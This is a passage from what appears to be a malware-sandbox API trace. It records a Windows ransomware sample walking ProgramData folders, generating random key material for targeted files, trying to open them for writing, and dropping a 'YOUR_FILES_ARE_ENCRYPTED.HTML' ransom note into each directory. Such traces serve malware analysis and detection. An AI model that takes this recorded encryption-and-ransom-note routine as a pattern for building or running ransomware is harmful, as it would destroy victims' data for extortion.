ftLastAccessTime.dwLowDateTime=0x64d3dee4, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0x2a2ccebc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x70c1, dwReserved0=0x0, dwReserved1=0x60, cFileName="watermark.png", cAlternateFileName="")) returned 1 [0156.740] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png") returned 101 [0156.740] lstrcmpW (lpString1="watermark.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.740] PathFindExtensionW (pszPath="watermark.png") returned=".png" [0156.740] lstrlenW (lpString=".png") returned 4 [0156.740] PathFindExtensionW (pszPath="watermark.png") returned=".png" [0156.740] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0156.740] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0156.740] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64d3dee4, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0x64d3dee4, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0x2a2ccebc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x70c1, dwReserved0=0x0, dwReserved1=0x60, cFileName="watermark.png", cAlternateFileName="")) returned 0 [0156.740] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0156.740] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 117 [0156.740] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0156.743] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0156.745] CloseHandle (hObject=0x598) returned 1 [0156.745] GetProcessHeap () returned 0x270000 [0156.746] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0156.746] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e978d9, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9e978d9, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{8702d817-5aad-4674-9ef3-4d3decd87120}", cAlternateFileName="{8702D~1")) returned 0 [0156.747] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0156.747] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 78 [0156.747] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0156.750] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0156.752] CloseHandle (hObject=0x58c) returned 1 [0156.752] GetProcessHeap () returned 0x270000 [0156.753] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0156.753] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9ebda38, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9ebda38, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Task", cAlternateFileName="")) returned 1 [0156.753] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task") returned 46 [0156.753] GetProcessHeap () returned 0x270000 [0156.753] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0156.753] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task" [0156.753] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\*" [0156.753] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9ebda38, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9ebda38, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0156.753] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9ebda38, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9ebda38, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.753] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x917f121e, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x917f121e, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", cAlternateFileName="{07DEB~1")) returned 1 [0156.753] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}") returned 85 [0156.754] GetProcessHeap () returned 0x270000 [0156.754] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0156.754] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}" [0156.754] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*" [0156.754] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x917f121e, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x917f121e, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0156.756] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x917f121e, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x917f121e, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.756] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x917f121e, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x95b71b60, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x917f121e, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="en-US", cAlternateFileName="")) returned 1 [0156.756] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US") returned 91 [0156.756] GetProcessHeap () returned 0x270000 [0156.756] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7400058 [0156.757] lstrcpyW (in: lpString1=0x7400058, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US" [0156.757] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*" [0156.757] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x917f121e, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x95b71b60, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x917f121e, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0156.757] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x917f121e, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x95b71b60, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x917f121e, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.758] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83da3d14, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x842daf62, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x83da3d14, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x536, dwReserved0=0x0, dwReserved1=0x60, cFileName="resource.xml", cAlternateFileName="")) returned 1 [0156.758] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml") returned 104 [0156.758] lstrcmpW (lpString1="resource.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.758] PathFindExtensionW (pszPath="resource.xml") returned=".xml" [0156.758] lstrlenW (lpString=".xml") returned 4 [0156.758] PathFindExtensionW (pszPath="resource.xml") returned=".xml" [0156.758] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0156.758] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0156.759] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83da3d14, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x842daf62, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x83da3d14, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x536, dwReserved0=0x0, dwReserved1=0x60, cFileName="resource.xml", cAlternateFileName="")) returned 0 [0156.759] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0156.759] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0156.759] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0156.760] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0156.762] CloseHandle (hObject=0x5a0) returned 1 [0156.762] GetProcessHeap () returned 0x270000 [0156.763] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7400058 | out: hHeap=0x270000) returned 1 [0156.763] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x647bcc04, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0x647bcc04, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0x112e5ebc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xd0a3, dwReserved0=0x0, dwReserved1=0x60, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0156.763] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico") returned 96 [0156.763] lstrcmpW (lpString1="folder.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.763] PathFindExtensionW (pszPath="folder.ico") returned=".ico" [0156.763] lstrlenW (lpString=".ico") returned 4 [0156.763] PathFindExtensionW (pszPath="folder.ico") returned=".ico" [0156.763] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6487b2e4, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0x6487b2e4, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0x112e5ebc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x72ee, dwReserved0=0x0, dwReserved1=0x60, cFileName="netfol.ico", cAlternateFileName="")) returned 1 [0156.763] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico") returned 96 [0156.763] lstrcmpW (lpString1="netfol.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.763] PathFindExtensionW (pszPath="netfol.ico") returned=".ico" [0156.763] lstrlenW (lpString=".ico") returned 4 [0156.763] PathFindExtensionW (pszPath="netfol.ico") returned=".ico" [0156.763] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x647e2d64, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0x647e2d64, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0x113582dc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x14668, dwReserved0=0x0, dwReserved1=0x60, cFileName="pictures.ico", cAlternateFileName="")) returned 1 [0156.763] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico") returned 98 [0156.763] lstrcmpW (lpString1="pictures.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.763] PathFindExtensionW (pszPath="pictures.ico") returned=".ico" [0156.763] lstrlenW (lpString=".ico") returned 4 [0156.763] PathFindExtensionW (pszPath="pictures.ico") returned=".ico" [0156.763] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x647bcc04, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0x647bcc04, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0x113582dc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x536, dwReserved0=0x0, dwReserved1=0x60, cFileName="resource.xml", cAlternateFileName="")) returned 1 [0156.763] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml") returned 98 [0156.763] lstrcmpW (lpString1="resource.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.763] PathFindExtensionW (pszPath="resource.xml") returned=".xml" [0156.763] lstrlenW (lpString=".xml") returned 4 [0156.763] PathFindExtensionW (pszPath="resource.xml") returned=".xml" [0156.763] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0156.764] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0156.764] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64808ec4, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0x64808ec4, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0x113582dc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xcaa9, dwReserved0=0x0, dwReserved1=0x60, cFileName="ringtones.ico", cAlternateFileName="")) returned 1 [0156.764] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico") returned 99 [0156.764] lstrcmpW (lpString1="ringtones.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.764] PathFindExtensionW (pszPath="ringtones.ico") returned=".ico" [0156.764] lstrlenW (lpString=".ico") returned 4 [0156.764] PathFindExtensionW (pszPath="ringtones.ico") returned=".ico" [0156.764] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64808ec4, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0x64808ec4, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0x1137e43c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x10850, dwReserved0=0x0, dwReserved1=0x60, cFileName="settings.ico", cAlternateFileName="")) returned 1 [0156.765] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico") returned 98 [0156.765] lstrcmpW (lpString1="settings.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.765] PathFindExtensionW (pszPath="settings.ico") returned=".ico" [0156.765] lstrlenW (lpString=".ico") returned 4 [0156.765] PathFindExtensionW (pszPath="settings.ico") returned=".ico" [0156.765] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6482f024, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0x6482f024, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0x1137e43c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xc04b, dwReserved0=0x0, dwReserved1=0x60, cFileName="sync.ico", cAlternateFileName="")) returned 1 [0156.765] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico") returned 94 [0156.765] lstrcmpW (lpString1="sync.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.765] PathFindExtensionW (pszPath="sync.ico") returned=".ico" [0156.765] lstrlenW (lpString=".ico") returned 4 [0156.765] PathFindExtensionW (pszPath="sync.ico") returned=".ico" [0156.765] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1137e43c, ftCreationTime.dwHighDateTime=0x1c9ea14, ftLastAccessTime.dwLowDateTime=0x1137e43c, ftLastAccessTime.dwHighDateTime=0x1c9ea14, ftLastWriteTime.dwLowDateTime=0x1137e43c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x3473, dwReserved0=0x0, dwReserved1=0x60, cFileName="tasks.xml", cAlternateFileName="")) returned 1 [0156.765] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml") returned 95 [0156.765] lstrcmpW (lpString1="tasks.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 